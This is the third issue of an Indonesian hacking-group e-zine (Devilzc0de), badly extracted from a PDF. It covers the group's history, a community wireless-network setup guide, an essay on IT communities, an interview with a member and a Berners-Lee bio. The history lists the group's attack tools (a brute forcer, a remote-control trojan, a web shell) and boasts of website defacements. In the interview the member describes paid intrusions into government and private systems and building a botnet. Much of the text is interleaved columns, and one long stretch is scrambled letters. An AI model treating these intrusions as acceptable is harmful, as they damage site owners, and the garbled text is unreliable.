Devilzc0de
E-Magazine #3 Edisi Transisi
$config['encryption_key'] = 'devilzc0de_is_rock';
-DeMT-
Devilc0de INDONESIA “To Unite and Develop” 2
“Independence C0DES, DC Backs to Holy”
DARI REDAKSI
Devilzc0de E-Magazine
Daftar ISI
Devilz Tutorials:
DC Backs to HOLY
Dirgahayu INDONESIA Ku
CI PROJECT CODING 1 (AUTO LOGIN)
(Wenkhairu)
Devilzc0de untuk INDONESIA
Sql Injection Dengan Into Outfile
(DC’s History)
(Unyil)
Devilz Recommendation:
Devilz Notes:
Membangun Jaringan Internet Rt/Rw
(chaer.newbie) Casper_Spy dan Hacker Elite Tante Caroline
(Casper_Spy)
Devilz Figures:
Tahukan Engkau Wahai HACKER!!!
Wawancara Tokoh IT Indonesia (Bunga MataHarry)
”Harry Sufehmi”
Devilz Products:
Devilzc0de T-Shirt
Devilc0de INDONESIA “To Unite and Develop” 4
Devilz Closing by DeMT
“Independence C0DES, DC Backs to Holy”
MOHON MAAF
LAHIR DAN BATIN
Kemerdekaan
adalah…..
kebebasan yang
diperjuangkan
Saatnya
memperjuangkan
kebebasan
bangsaku yang
MIRING
DIRGAHAYU
INDONESIA
JAYALAH
NEGERIKU
Have a Nice Study for Everyone
<?php
$x = "x1d70ef32";
$string = "s3HaCkeR05mUdA08mErUbAh09DuNIaVSE5Oy";
$string = "jAyaLaHs306INDONESIAo5kU";
DEVILZ WELCOME
-INDEPENDENCE CODES-
DC History [Beta]
http://devilzc0de.forumotion.com.
Devilz
HISTORY
Devilc0de INDONESIA “To Unite and Develop” 9
“Independence C0DES, DC Backs to Holy”
dengan hosting dan domain yang berbayar. Di domain SQL Injection, tapi belum bisa untuk MySQL
versi 4″
yang baru ini DC di kelola oleh Gunslinger_ ,
FTP Brute Forcer “Buat nge-Brute Password
FTP account”
petimati dan xtronxic. Tidak lama kemudian DC
Devilzc0de Dual OS Trojan Horse “Untuk
terkena malapetaka, forum yang mereka jaga itu telah
meremote komputer korban”
di jebol oleh ange78 seorang hacker dari http://gaza-
Dark Jumper “Digunakan untuk menemukan
hacker.com/cc/ (mirror : http://www.zone- setiap website pada server yang sama”
h.org/mirror/id/9709573). Kemudian DC melakukan Devilzc0de Banner Grab “Untuk mencari info
perbaikan dan dibentuk kepengurusan baru di di Server target”
bisa di nikmati bersama oleh member lainnya. Di Bukan Forum Hacker kalau tidak mempunyai kisah
antaranya majalah online berupa E-Book ; deface/hack yang mengejutkan. Banyak aksi deface
DevilzShell “Berupa shell yang digunakan Entah apa alasan mereka yang sesama anak Negri
MD5 Cracker”
SID kena hack oleh flyff666 Devilzc0de beraksi kembali. Tapi ini tidak untuk
2. Jagoan Hosting
http://www.zone-h.org/mirror/id/13078051 <<== Mirror
http://www.zone-h.org/archive/notifier=devilzc0de
Dalam aksi ini lumayan cukup menuai kontroversi.
<<== Semua mirror aksi devilzc0de yang telah di
Bagaimana tidak, web lokal yang satu tanah air di
arsive kan.
hajar juga.
3. 1malaysia.com
Jejaring Social DC
Situs jejaring social yang sudah mulai di isue kan di
koran Malaysia sedia gantikan Facebook ini telah dua Sekarang DC tidak hanya sebatas sebagai untuk
kali berhasil di hack oleh devilzc0de. Berawal dari aksi Forum Hacker saja. Akan tetapi memberikan sesuatu
penantangan terhadap Devilzc0de di shoutmix forum yang berbeda untuk di tampilkan kepada masyarakat
DC yang berujung pada tindakan deface yang di secara luas. Disini (http://devilzc0de.org) akan di
lakukan oleh admin Devilzc0de. Tapi setelah aksi temukan Jejaring Social yang imut dan lucu yang tidak
tersebut DC pun mengeluarkan pernyataan damai sesuai dengan namanya Devilzc0de. Memang untuk
pertama kali orang mendengan kata Devilz pasti Di Indonesia banyak sekali forum-forum yang sama
kesannya negatife dan Jahat. Tapi apalah arti sebuah bahasan dan tujuannya dalam dunia Hacking
nama? DC mencoba memberikan sesuatu yang (UnderGround). Sudah barang tentu persaingan akan
berbeda di Jejaring Social ala Devilzc0de. terjadi, entah itu untuk menjaga gengsi semata atau
demikian, itulah yang di tampilkan Devilzc0de di DC bahasan seputar Dunia Hacking kini mencoba sesuatu
Social Network. Satu Jejaring Social yang akrab di yang baru denga Social Networknya yang masih
pandang mata, imut dan juga menggemaskan. dalam versi Beta dan Social Networknya itu dapan
orang lain, layaknya beli JCow untuk membangun satu Menanggapi tanggapan tersebut, sudah barang tentu
situs Jejaring Social. Akan tetapi DC berusaha yang namanya persaingan pasti setidaknya ada yang
mengumpulkan sejumlah code-code dan di satu merasa terusik oleh kehadiran SoNet DC. Satu, Dua
padukan (diramu) untuk menjadi satu web Jejaring komunitan Forum Hacker tentunya pasti yang ingin
Social yang tidak kalah menariknya dengan SoNet menjatuhkan DC dan menginginkan DC tidak
paling populer saat ini. Meski pun masih dalam tahap dipercaya lagi dari segi keamanan karena telah bisa di
development, tapi member SoNet DC untuk dua hari tembus (hack) oleh orang lain.
Peralatan dan bahan yang di butuhkan Server : USB Wireless atau wajanbolic
200.000
Untuk memulai proyek RT/RW Net harus ada
Galvanis /Bambu
tempat yang akan dijadikan sebagai Central
100.000
(server) RT/RW-Net yakni tempat untuk
mengelola system jaringan atau tempat akan ________________________________________
diletakanya server perangkat modem, Billing
Total 700.000
Server, Access Point dan Switch dan juga
sebagai tempat untuk mendistribusikan koneksi
internet keseluruh pelanggan /rumah setiap Installasi Rt / Rw NeT
anggota.
Untuk billing saya menggunakan easy hotspot
silahkan download softwarenya di sini
Peralatan dan bahan yang di butuhkan oleh user : http://easyhotspot.inov.asia/
- PC Desktop/Notebook
- Kartu Wireless ( untuk komputer/Notebook yang Disini saya menggunakan sistem voucher prepaid
belum memilki Card Wireless/WiFi) yang mana juga digunakan di cafe hotspot area.
- Antena Yagi atau Wajan Bolik sama halnya userman bila di mikrotik OS yang
bisa juga menjadi billing hotspot external.
Berikut contoh tampilannya :
Perkiraan Biaya Operasional Untuk Server /
Penyedia Layanan Rt/Rw-NeT
4.Download dan Patch Lusca sudo /etc/init.d/squid stop atau squid stop (ubuntu
dengan perintah : 10.10 Lts)
#'wget http://lusca-
cache.googlecode.com/files/LUSCA_HEAD- # kemudian copy file squid.conf, tunning-
r14733.tar.gz ubuntu.conf dan storeurl-ubuntu.pl yg di download
tadi kedalam folder /etc/squid
lalu ekstrak dan masuk ke foldernya :
5. Langkah selanjutnya
Esensi perjalanan hidup manusia adalah Indonesia baru memulai praktek demokrasi yang
menemukan hal-hal yang paling mendasar dalam termasuk termasuk didalamnya adalah kebebasan
menjalani hidup di dunia dan karenanya manusia informasi, bahkan informasi itu sendiri dalam
selalu ingin berkembang dalam misi nya untuk prakteknya bisa di diperjual-belikan. Informasi
melengkapi tujuan hidup. Waktu berjalan dan dalam pengetahuan misalnya bisa membuat
generasi silih berganti, begitu juga manusia pendidikan tertentu, selama dia bisa menguasai
dengan perkembangannya dari waktu ke waktu, materi-materi informasi yang berkenaan dengan
sehingga sampai hari ini kita bisa melihat begitu bidang lain yang dia minati, bukan nya hal
besar kekuatan manusia untuk menjalani hidup mustahil untuk dapat dilakukan.
dan bertahan bahkan dalam persaingan dengan
mahluk lain. Pengembangan demi Contoh lain yang nyata dalam bidang Security IT,
pengembangan, dari generasi ke generasi, semua banyak individu atau perorangan yang
hasilnya kita bisa nikmati dan rasakan sekarang sebenarnya bukan datang dari latar belakang
dibandingkan dengan waktu lampau yg Teknologi dan Informasi bisa melakukan hal-hal,
sedemikian sulit kita dalam berusaha untuk teknik-teknik, bahkan mampu membangun
mengembangkan diri. Saat ini semua menjadi (develop) atau menciptakan sesuatu yang
semakin lebih mudah karena kita terus mencari berhubungan dengan bidang tersebut. Hal ini
dan terus berkembang. karena pembangunan teknologi yang semakin
lama semakin maju dan kemudahan memperoleh
Peran pengembangan itu selalu jatuh dan informasi yang bersangkutan, seperti contoh kita
menjadi tugas generasi muda berikut, begitulah dapat mencari apa saja di dunia ini melalui
seterusnya. Dan pada jaman sekarang kita semua browsing google.com
menyadari bahwa informasi adalah unsur penting
dalam sebuah pengembangan bahkan Manusia adalah mahluk sosial yang
pembangunan, dimana kita didukung oleh membutuhkan manusia lain dalam hidupnya,
informasi dan teknologi yg membantu kita dalam sedemikian perkembangan kehidupan sosial dan
semua aspek kehidupan. Begitu kuat nya pertukaran informasi antar manusia di
kekuatan informasi yang di miliki manusia lingkungan mereka masing-masing menciptakan
bahkan manusia itu sendiri bisa menciptakan golongan-golongan bahkan berbagai komunitas di
perang dan persaingan dengan sesamanya atau berbagai aspek. Dalam hal ini kita bisa melihat
dengan dirinya sendiri. komunitas-komunitas yang ada dalam IT
(Informasi dan Teknologi), dalam perjalanan nya
Saya melihat pada awal mengenal teknologi dan sudah begitu banyak komunitas yang
informasi, seseorang yg memiliki informasi menawarkan banyak sekali informasi mengenai
lengkap di tangannya adalah orang-orang yang bidang tersebut dan materi-materi yang bisa kita
bisa mengendalikan bahkan menguasai lain nya. baca sekedar mengetahui atau mempelajarinya.
Contoh yang dapat kita lihat adalah begitu besar Dari sana pula tumbuh dan muncul kader-kader
efek informasi yg di kumandangkan TV ONE baru dalam bidang tersebut walau mereka datang
seperti “gerakan 1000 coin” untuk Prita, sudah dari latar belakang yang berbeda sekalipun.
anda bisa tebak sendiri berapa jumlah nominal Mereka punya struktur organisasi yang bahkan
hasil dari penyebaran informasi tersebut… bukan bisa dikatakan lebih lengkap daripada organisasi
main. standar lain pada umumnya, punya pimpinan dan
panutan untuk mereka masing-masing.
implementasinya pada generasi muda Indonesia waktu belajar.” Padahal alangkah baiknya hal
yang menjadi pokok bahasan dalam artikel ini. tersebut tidak perlu di jadikan tradisi yang justru
Salah satu contoh nya adalah perbaikan persepsi mempersulit bahkan berkesan balas dendam atas
yang salah selama ini tentang para pelaku dalam keadaan lampau.
bidang Security IT ini dalam hal ini kita bisa sebut
“Hacker” begitu masyarakat men-cap negatif dan Jaman berubah dan segalanya akan semakin
buruk terhadap kata “hacker” ini dan selalu aksi berkembang dan lebih mudah, yang patut di ingat
nya dikaitkan dengan hal-hal yang merugikan dan adalah kita tidak bisa memaksakan orang lain
melanggar hukum. Kita sendiri tidak membahas untuk bisa menjadi seperti kita tetapi akan lebih
pula sejarah hacker itu sendiri muncul awalnya baik dan lebih berguna dimana kita bisa
dan apa saja yang menjadi dasar tindakan atau mengusahakan perbaikan persepsi yang selama
aksi-aksi mereka karena hal itu sudah banyak ini sudah salah dan bagaimana bisa
dibahas dan dapat dicari dengan mudah di menumbuhkan minat orang-orang sehingga
google.com nantinya perkembangan bidang tersebut bisa
mendapatkan dukungan dari pelbagai pihak.
Kenapa kita memilih bahasan mengenai peran Persaingan yang terjadi sekarang ini adalah hasil
komunitas beserta pengembangan nya di bidang dari perlombaan antar pelaku-pelaku bidang
IT tanah air, lebih cenderung karena kita merasa tersebut karena kurang adanya penyaluran
masih banyak perbaikan dan pengembangan yang kearah yang positif serta didasari oleh masing-
harus disadari oleh berbagai pihak terkait guna masing ego. Ingat lah masa depan akan
meraih tujuan yang lebih baik lagi dalam bidang menghasilkan yang sesuai dengan apa yang
tersebut. Seperti yang kita tahu peran komunitas ditanamkan dahulu. Dan yang jelas adalah
IT yang telah ada di tanah air sebenarnya sangat sosialisasi yang begitu minim dalam waktu
membantu perkembangan awal IT Indonesia. sekarang ini.
Dalam perjalanan berbagai komunitas Selama ini gerakan bawah tanah yang identik
underground yang begitu sangat mempengaruhi dengan tersembunyi dan bergerak sendiri-sendiri
tumbuh kembangnya individu-individu maupun merupakan hal yang sering kita jumpai dan
komunitas lain yang perduli akan penting nya semakin meluas dan (maaf) semakin ngelantur
keamanan sebuah sistem dewasa ini. Dari sana kemana-mana. Ada kalanya kita bisa duduk
lah bermunculan tokoh-tokoh dikalangan ini bersama mengundang dalam sebuah acara
serta pakar-pakar yang bisa dikatakan ahli dalam mungkin yang bersifat informal dan saling
bidang ini. Namun akhir-akhir ini bisa terlihat berdiskusi sehat atas apa yang menjadi misi dan
jelas bahwa semakin surut nya atau bahkan tidak visi kedepannya ketimbang saling menyalakan
terlintas keinginan untuk saling merangkul dan satu sama lain yang jelas-jelas tidak
saling membangun untuk perkembangan bidang menghasilkan apa-apa justru makin menyurutkan
ini dikarenakan sifat natural manusia adalah serta menambah panjang record “minus” dalam
bersaing dan cenderung saling menjatuhkan, dan bidang tersebut.
jangan lupa soal ambisi ingin saling menguasai.
http://ciberpolitica.net
22
g k t
e a a t t e e b g a j
a e e p a d
n a :
h y y X a i a n
r s e g m s n n a n i
a y o n
r a n I
I u d u e a b u t o r r h A n
i
y n t e i
b n a b a b t y n
i p g a
i a k e
t e i
s ,
- a n t a n m j
n n n g h o
r a s s r
e n b a h h
k r b o n n l
u e e e m I t n e d k e u t I e a
k a
a
y e t C I a b r e r
e a a a S e n p g , b m h N
n k a . s g a m m m k u k y . a k o r a
j i a
a r e n a
t r m n g a I u a b a i
s e t k i a i m a a
n e i a n h . t r m m s , a b d , n k
Y a
k b a ? d a h
u
r n e
b h
a a
u
l
o e r
e a
y w i
D
u
s
n
a u
l
a
d u n
R a
t
s
u
g
a i
n
i
b y
i a
l
a
b
e
t e
b u
b
g
n s n
e t
g . n
a
h
a . g D a
l n g
n a
R a r
e
B i
l i
d
r
a a
d n ,
n , e e n
a m n
a
s u b a
p n
a .
s
e
s
a
k a k
i
f
A k
i t .
a a g h a a a a s m k a a a m i
l a Y a a b i
n
d h g D y d i a - a k m
H a
n
a
y
n g n
u
a
d i
r n . n
l
h
e u
t
p
a
y
a i
b
b
r
e
s b a .
r
w
e
i
s t e
g
i
s ?
s k g n p a a a n a l
o n . i
s s i a m p a t e u p a
i n n a h t a s a a r d u u a j h n r
u s a y
b i a t
n m h n k i a b k e a
j l h e
k u a
l a o n a p n
a a
l d i
c a p a
t i
s M t e p a u e a h e d e t a
i e i e
t e n a
i a n
i m r g r
a s t n a b d n a r m
s m b k r t a t .
u m e e g n b i h a t m u
s I m e a
e b a r e e d n r i m m n e r
p a k T b b l
a
n , u d e p S a e a d l a s i
g r d t
a m e a I g a e d
o n s n b k . u m b k a d k o u u g u p y a n w s
d a a a a n l a u
t n e l S s l
e i n i a
y a n i
d
n
I n a
l k y d a a
l e
l n y n r s a o a n b d l
u n j
g a
g a a n i
t k e p a a
s u e a d
i n a t i
d a
j t u h d a
T a g k u n S m w t
n y t k l
u i
k a n e d a n d
I t
s e t r a a i a , a i a , e p n y e b t k u r
i u
a s a e i
s s .
k i k u
l i
s n s a
y t r
i a n m e a a g A M
i
n g p s e o i
r d - a e a n h e k
i i
d l
u s u p g
u n m a h n b a k n l n g a a a c p u t u , b a n h m
a a d a o m n u a g o n k
i s u r e l
a s m i a
t a
D d l n l d e e t w n d i t a b u a m b l a e S r n u
. e a e i
n n n a a n r
a e i e o t
i e e e u . e a a
1 s d p I I m m u k y I j K b s S K k s s p m 2 b T K
s a
t n k a n i
u
t i
k a . u r a .
t b
i g d n t a k i
l o
l
s n n n t i
23
t n a d r
u a a u e . n ,
l l
a u , a
n a t n g k r
t t a a n s n d
e w n u m k a a
i a a a n e i
s t a a
a e o a u b g m s n k n o u a - n u
m k t r j t m a u i
b a g a i
s m m a a n l
e i a g a
t n n e h c h n
i g s b
i n a y m a a
c t
i d r
e n e u l a a a n n e a r
t a n e d l
e
a k u n i m a 2 b n y d e u f k
i n d a a t a s
f a d c a t
’
b u
j m a m n d g d n . s o
i D a a a
l k l
a i
i n
i
d d s u a
s a , n k a
i a u a n C y e a a a
a g a n a
t r h a a u r
i y r d e m p l m g l
-
n s a i o
f g i
l k y t d a e n s a a , e r
o a n
S a i
b p n n i
p e ? n n k t a l
a k t
a n m f b i
. d h u n a r l u u e g n k h d u k u i r a
l
u e a
‘
n a n a m y i
d t
a g s n a a o i t ? a s e n
u k a k o p a m m u n a k k k s n a h m b u b a
p u h . a k u n
i j r s a n y a a o
t i u s a a o t
i e
a t
i a n p a
t a n n o e a
k i n , m a g u N c t
s k d
p d a a m a l e a
r f s m i h n a a e y n b . h n ,
a h u g u y m a n e y e
l i d d n a e a a i i
s h
a
t m n i
t r a g j a h m n o k m u a a b S n d t a a
t
h n - a r
e o i
s o n a
l k a u s i
a i
a k u . a u a k n
a i
r .
i h b p f
- e l
o i
k e i
d l
a u b e b g m a a i
g h s u o i
r
l
a e r
i a m e m n n a b i d t
i m s . a m d r r i b v e
s d d i
t o h d a u e k g n
i m a
t e a e e m m d
a m n u r S u
r d c m m n s a n m B u r s p n d e a m
e e M e . o n e e e e i
n m i i a . a e e e i e a e
m p s p 4 f I t s p p I l
I d d y A 5 k s k k S s K m & p
n g a i a
a i a
l n j g s k
r n u a n r n u a i
t h
a a i .
t b y a h e
k , a
y h b
i p e ? s u
p y a u h k a
t e a
y a u r
t k t u n
& k . n u b a a g n b n h y a n a
i n n t
i e a
u a n m e i p t n i a n j o s a e s p p
o t i a s g a i
s n r g g t - n g k k s m t , n
b n s i
d g e r o r k i
r a
l e n n n
i a n a i e a i a
r u e n S e l e a e i m s a r g s a n b p t
“Independence C0DES, DC Backs to Holy”
u n a
j a . t o b - h e a
y l
u e n a y a b a c u a
P g o n b a a g n e i m g p u
t t m i t i g e
t h a
f b t s
n d e i t n k b s
k e n i
s n n a j n - e m ( o
l
o a n m m n i
k a e t P e k i g e n a a e a s
i d e o
n u I e u d t a a m i
l
i p m n
i p u
r r g d b b m h l
n j
r i a k d r
e n a g n s m a d t s a n o a a . a
i t
O e d i r i k a t
n n a u
t ? i
a i
t a n u & p a n c h n i h p u
b i
f s e d c i i g i
s a p n e s a t g a e d a u b
k i e P t a m c g n - y a s y b i
s p h n k n i
k k a
t l r e
a h W n . a h e e n e s n m k k s m - u e
l e g a a g e
t a s
r
P a
l o a s m p e d u l
a a h i
l g e s p o d n D n n
i t e
s e i
s d i
n e a i m t
i s a a n u
t a i i
d . m a m g u t
a t n n u p r a s n s s
i n B b a m i
s t a ,
a n a i y n j
r g e I d g a d a a
i a p m r n e g j a y c d a n )
e n u i
d p n r
e s k a a . i
d o a r t r a n a h a y a e
k a k h n
i a a n e i
a d t g n
i e i a a a s b
i i
s c a s t s l
o
y e t
e u l
a j k n a n a ,
a s r
i g s h u d u & t y a u h
a
j r n r p r
e a e o m a k a
j l n d a i
b i
d t r t n
i s b t
a
r ,
s f r u
l k k g d a h g g e a n s n a i
t r r a a r y
e s n e e g n n r
i r
e n
i u
t n r d e a t k e d s a
j e t
i j t
i
k e a t s n t a a I d t n i a a a s r u a t n n a m k e a r
l
i l k n a a
k n n i t e t r K , e b d , a i h e p g u
s e s I n y r a u d n n n o h n k e i
t n t a p n a r c
a r
i a ,
g a e m g r a e m e . a a
i s
r a s d a a r a e
h w b m k b i e g m n m k
i n t t a e n d a n s w a h s
e n u u a n t n i l
i u n
i a h t u , h p e u a t n n
h r
e b a
r g s h g a u a e k e
c m p
i r m a l p i
r a e k t
i k n a a
a k a a a a
l t
u a b p k c a a l
a e - s a u i
d w k g s , e g g
l
a c m k k m a l B m m a a
f m f a k m i
t u
r h a
l n a s n a p m n n
d a e e e r d a . e o l
e e e e t
a e e a e a a e b b a d u e e e
a h m S k e
t a S 3 p c b d s D d s p m b m w s i
d y y a Y S d d
g h
n h a u
t / / -
a a n k , e a 0 9 n
24
y l a a r t s j 9 2 a
r a g e a u h /
r 0 6 k
e m d n m w g b a e 1 1 s
k u a e , . o n a l
e k -
9 -
7
u
r
c l
e a d e r
e P i
d t c 0 0 u
l
a b k g t g ,
i
a
h - - e
H e e a
y d w a u n p - 1 4 m
s r e
l o e l
r e a i
d
0
- 0
- / :
i
. n
a n m t
i u o k ? n n s n h A u l e I
R k n i
n m k d a s u a a i a m g e a e i
g
k
‘
a a n a g k o t
n d e r n h s .
i a m _ A u m a
a
j k s a s n s u n s o a e u
r r
i g r r H
r a a k g i
t n n a g e k s e d n k e d g b
e j
r j
r a n n a a s k n s k - p n a a u k S
" i
l n m
k
i e e a e k k
i a
l a a u
j k e n p t
n c a a e
d g k T
I b p h s e k y n n c a s e n u a h k y m
n g a i
n j n a u a m a s a H a e g
u
l e n a t
a t
a r i
f g a a
i g n h a i a T a /
i l
a s n u
r m i k u g e
c e n
i g s n e n d i . r
a .
a k d n a a
e l
a a k n d l
a n u e a a d i
g s i
w a a r
p u s M r a n n p a n d m i
d n a a c a / k o m
g a i e s e e d a .
i u a a m n b a i g 1 u e k
n g .
a p m m g n g r g k a e r y b r # b s a
a m a d g t
n a m a m i
b n k n r e a r : o
. n e d
y & l a m n a a a p : b e a u a b s a s a i a s i
t
l k e a g d y
m h r t
r m y j
n N k n u c
i i o n ,
a a a g m y n n i
s a a
l e e e r u A - g a L h d p e n n
h s y n a a p l a b b g e n D r n k . t e , r a u
i
b n a & n s k
a i
r a d & n t
u e e a r t
u E p s a
k g
k a y n a k k d a h a p a k n a b r i
k c n m
a g b n a n s k a g m y c e j
a e i i
h , e a
y n e a
k y a a e u e n n m n a s g e
s k w t g d n
n a h
i n k n
a
d r
e t
i r r
e o a t h a r c . e n
i u -
a y b n u
j a
t a a t r p p e k y a i n e a n _ t r
o o d n u h e e n
”
b g e p a r p m
i p u
p e g e t b d t H / r e m e
h n l m e a a a k n a g i
d a
l N m k /
: e e k
i a a m e P r g n m c e y n m e m a c e p k p t
r c
b r d o . a a a o a a a a r e d A a
i a h t
t c i
n e a
e
l o a k m 6 h B d C H m S y g c p a D d h T h a I b h
“Independence C0DES, DC Backs to Holy”
o Get off as soon as possible d4r3dd3v1l: gini aja ane kasih contoh figur2 buat visi
ke arah sana jadi mencontoh tu yg baik, bukan
o Keep a bottle of "Wild Turkey" near the terminal
mencontoh orang-orang yang ngedeface dan ane juga
(RED : *CONTOH TUH)
sendiri ada salah juga (ngebikin botnet ini salah) coba
dan juga dont attack gov klo sekarang banyakan orang seperti Linus Torvalds,Timothy Berners-Lee (pencipta
pikir deface itu hebat. klo dulu orang2 hebat bisa www dinobatkan sebagai orang yang inspirasional) ini
nyusup tapi ga ketauan klo ane sendiri bukan intruder contoh hacker yang sebenernya mereka berprinsip
yg hebat bro. open source begini coba kita pikir kalau nggak ada
orang yang menemukan www. sekarang kita masih
Redaksi : sekarang banyak ya forum/komunitas pake yg namanya BBS dan gopher,sayangnya gopher
terlebih mereka mengajarkan deface cyberwar ga bisa berkembang seperti http tapi emang begitulah
ironisnya banyak juga defacer yang bawa-bawa http sendiri punya banyak kelebihan dibanding gopher
agama,walaupun mereka mengatasnamakan aktivis karenanya dia nggak support image apalagi animasi
cyber tapi tidak ada sisi hacktivisnya. gimana menurut mana ada sih orang-orang deface website karena ga
pandangan anda dan punya cara khusus nggak untuk akan pernah ada namanya website
meng-counter pendapat bahwa hacker=perusak.
karena di situ tadi tercantum defacer (hacked by bla- Redaksi : right :)
bla-bla dan sejenisnya)
Redaksi : menurut d4r3d3v1l mungkin nggak sih kita
d4r3d3v1l : mengcounter juga udah susah ya coba kita orang indonesia bisa menciptakan demikian,padahal
kasih contoh aja develop macem-macem. kl mao niru jaman sekarang pendidikan ampun-ampunan ya :(
sukur klo ga mao ya terserah sebenernya bebas mao orang yang kompeten jadi putus asa karena mau
ngapain aja kan kita prinsipnya freedom ngelanjutin ke jenjang lebih tinggi jadi
kehambat,semisal seperti ada yang berhasil bikin CMS
Redaksi : beralih ke pertanyaan yang 'umum' tapi khas indonesia,antivirus,bahkan httpd dari php
please jawab dengan versi d4r3d3v1l sendiri. apa sih
hacker tuh aslinya? trus kenapa mereka suka banget d4r3dd3v1l: kenapa enggak orang sini bisa cuma
kata-kata 'hacked by bla-bla di tampilan utama site' ? mereka males doang
d4r3d3v1l : hacker dulunya dari orang-orang yg punya Redaksi : selain itu penggunanya juga jarang om ;))
kemampuan pemrograman di atas programmer umum
d4r3d3v1l : minimal kalau pengen bisa develop sistem
mereka bisa bikin yg lebih baik dari programmer
harus bisa nemuin kelemahan sistem kompleks yang
umumnya klo dari kaca mata ane. hacker tuh adalah
berguna buat developer suatu sistem yang kompleks
pahlawan mereka yang bikin revolusi di dunia
sayangnya sekarang juga banyak hacker ngaku
komputer internet bisa sampai kayak gini,kita bisa
hacking nggak pake tool padahal mereka nggak ngerti
make os bagus seperti linux,bisa ada protokol http,nah
dengan mereka pake browser aja itu juga tool yang
klo dari kaca mata ane yg laenya. hacker tuh aslinya
dibikin programmer.
hebat bisa nemuin kelemahan dari suatu sistem /
program yang kompleks. maksud ane bukan cuma Redaksi :menurut om,bahasa pemrograman untuk
sekedar skrip-skrip php tapi yg perlu kemampuan hacking yang pas itu apa sih,terus materinya apa?
reverse engineering missal daemon, browser, kernel,
dll d4r3d3v1l : C aja open source sampe sekarang
banyakan make C (under nix) untuk hacking sangat di
Redaksi : di indonesia jarang banget kan ya phreaker sayangkan pikiran mereka cuma 1 gimana caranya
nya,untuk orang yang bercita-cita menjadi ngedeface nggak tertarik covering track
hacker,penting nggak sih belajar phreaking?
Redaksi: covering track, forensic, phreaking tuh
d4r3dd3v1l : itu terserah freedom / kebebasan penting banget ya padahal
Redaksi : pesan,kalau bisa beri pesan terhadap d4r3d3v1l : klo phreaking ga tau yah ;))
seorang newbie yang ingin sekali belajar
hacking,setidaknya supaya tidak terpaku / tersesat
Redaksi : kira-kira gimana sih kok bisa tertarik yg 1 subnet cuma gagal juga,soalnya jarang hacking
mempelajari hacking,cerita dikit dong apa memang win server cara bikin asp shell juga udah lupa
dulu background pendidikannya ke sistem informasi
and sejenis? Redaksi : lebih gampang mana jadi cracker atau
security system (menurut pengalaman ente)
d4r3d3v1l : dari smk jurusan akuntansi dulu ane orang
akuntan 7 tahunan sampe masuk ke unsoed juga d4r3d3v1l : cracker dong tinggal ngerusak doang mah
jurusan ilmu ekonomi masih ada belajar akuntansi gampang,lagian kan hacker beneran bukan tukang
emang udah seneng banget dari pertama kali nyentuh rusak dia bisa development jaringan,paham arsitektur
yg namanya komputer kalau perlu tar ampe meninggal jaringan,mengerti 7 layer mampu development sistem
komputer juga dikubur bareng di samping yang kompleks dan paham securitnya selain itu teliti
nemuin celah keamanan dari sistem/software yang
Redaksi : hacker yang menginspirasi ente siapa dibikin maupun bikinan orang lain dia bisa nemuin
sih?atau kalau di kelas musisi kan ada tuh kelemahan dari protokol-protokol nggak hanya
influence,nah d4r3d3v1l influence nya ke mana? menemukan tapi juga bisa develop sesuatu yg lebih
bagus karena ada real hacker di dunia ini maka
d4r3d3v1l : daredevil of internet linus torvald dia itu internet bisa sampai seperti sekarang bukan dari dulu
ngoding os loh. walaupun dia gak sendirian tapi tetep pada make BBS point intinya dia develop, dia
pelopornya dia sama yg pertama bkn bahasa C bisa analyze bug, dia bisa kembangkan jadi lebih
Dennis Ritchie coba klo ga ad penemu2 bahasa aman dan baik.
tingkat tinggi ampe sekarang kita koding asm semua
ngoding bahasa hex, binary tanpa bhs tingkat tinggi Redaksi : dalam merayakan kemerdekaan,harapan
dari seorang anda kepada negara ini soal internet tuh
Redaksi : kegiatan sehari harinya ngapain aja ? gimana sih?entah dari segi keamanan system
Kesibukan ? pemerintahan?? atau bandwith kita yang masih kalah
sama negara tetangga.
d4r3d3v1l : kerjaan kejebak banyak orang minta
bikinin web. Jadi ga bikin yg laen-laen terkadang juga d4r3d3v1l : ya moga2 aja kelak bisa ada orang yang
bikin software, tapi itu jarang. hebat bisa bikin internet berkembang yang seperti
bapak onno w purbo mungkin lebih dari itu yah berdoa
Redaksi : pernah gak jadi hacker bayaran?
aja deh
d4r3d3v1l : pernah sih cuma ga resmi kalau gagal ga
(REDAKSI . . . Amin . . .)
dapet duit bukan hacker namanya. lebih tepatnya
cracker hacker sama sekali ga ada aksi perusakan Redaksi : terus harapan ente untuk devilzc0de?
yang merusak adalah cracker plesetan hacker yg
muncul setelah adanya hacker d4r3d3v1l : ya moga2 aja bisa ada orang2 hebat kelak
arahnya ane harap ke arah orang sprt linus torvald
Redaksi : melalui invitation challenge atau surat minimal klo emang suka ngerusak mending pathnya
pribadi? ke arah orang2 spt george guninski,tavis ormandy tapi
klo emang murni cuma suka develop ya ane harap
d4r3d3v1l : dari temen biasa klienya janji ketemu
arahnya ke linus torvald. moga-moga aja kelak ada
Redaksi : penyerangan ke sistem pemerintahan atau orang2 yang punya banyak waktu yang mau rajin
swasta?? belajar tentang jaringan, misal apa itu 7 layer os, rajin
belajar tentang kernel ya minimal bisa ngompile kernel
Pernah gov pernah swasta tapi susah-susah lagian dah, rajin belajar pemrograman, bangun sistem,
waktunya juga selalu terbatas jd ribet waktu itu kan IIS daemon, dll, minimal suka nyari bug2 dari sistem
kebetulan ada jaringan 1 subnet itu 1 web 1 subnet kompleks
dah ane liat dia koneksi databasenya bisa klo 1
subnet tapi ga bs dari luar Redaksi : salut nih,cita-citanya tinggi *twothumbs*
Studi Lee berawal dari Fisika Teoritis di Oxford Kehidupan pribadinya berawal dari satu pernikahan
University dimana kala itu ia memahami fisika sebagai dengan seorang wanita yang juga seorang
ılmu yang mengkrompromikan antara matematika dan programmer Jane North C sampai setelah bercerainya
elektronika, antara teori dan praktek sampai akhirnya mereka, Lee menikah kembali dengan Nancy yang
merubah pemahamannya dikemudian hari. Bagi Lee juga masih seorang ahli komputer di WHO.
fisika itu menyenangkan dan merupakan dasar yang
Dalam usahanya memperoleh inspirasi, si jenius ini
fundamental untuk menciptakan sebuah sistem global.
suka memandang langit, menenangkan diri dibawah
Menurutnya di Fisika manusia belajar memikirkan
pepohonan teduh yang jauh dari keramaian.
beberapa aturan matematika sederhana pada skala
mikroskopis yang ketika diskalakan akan menjelaskan
sifat makrokopisnya.
Sumber: Kisah2 Hacker Legendaris, disarikan oleh tim
Menurut Lee di internet kita mencoba menggagas Redaksi.
protokol-protokol komputer yang ketika diperhitungkan
Tema : Programming
Author : Wenkhairu
membahas apa saja keperluan – keperluan Pada intinya di file config.php kita
yang harus kita sediakan, setelah harus merubah baris berikut
